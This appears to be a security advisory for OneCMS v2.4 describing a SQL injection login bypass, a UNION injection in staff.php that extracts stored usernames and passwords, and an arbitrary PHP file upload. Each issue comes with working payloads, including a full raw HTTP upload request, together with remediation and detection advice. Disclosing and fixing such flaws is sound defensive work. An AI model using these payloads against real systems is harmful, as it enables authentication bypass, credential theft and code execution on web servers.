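+--> SQL Injection (authentication bypass)

The login form's username value appears to reach the SQL query unescaped, so the quote and comment marker below rewrite the login condition. The fix is a parameterized query for the credential lookup, with the password verified in application code rather than inside the SQL string.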

Username: admin' or 1=1 /*
Password: something

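+--> SQL Injection

The `user` parameter of staff.php is injectable in the same way. The UNION below returns the username and password columns of onecms_users, so stored credentials on an affected install should be treated as exposed and rotated once the query is parameterized.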

http://localhost/OneCMS_v2.4/staff.php?user=aaa' union select 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/*

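+--> Arbitrary file upload!

The request below is sent with the injection string from the first issue in the `username` cookie, so the upload form is reached without valid credentials. The uploaded part is labelled `image/gif` but carries a `.php` filename and a PHP body, which suggests a_upload.php trusts the client-supplied type and name. Server-side, the handler should allow-list extensions, generate the stored filename itself, and write uploads to a location where scripts are not executed. POSTs to `a_upload.php?view=add2` with script extensions in the multipart filename are the log pattern to look for.
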
POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0
Cookie: username=admin'or 1=1/*; password=96e79218965eb72c92a549dd5a330112; login_date=1199693273; style=Trend

-----------------------------7d84115025c
Content-Disposition: form-data; name="ss_1"; filename="C:\path\to\file\test.php"
Content-Type: image/gif

<?
phpinfo
();
?>
-----------------------------7d84115025c
Content-Disposition: form-data; name="ss2_1"


-----------------------------7d84115025c
Content-Disposition: form-data; name="type_1"

image
-----------------------------7d84115025c
Content-Disposition: form-data; name="muche"

1
-----------------------------7d84115025c
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------7d84115025c--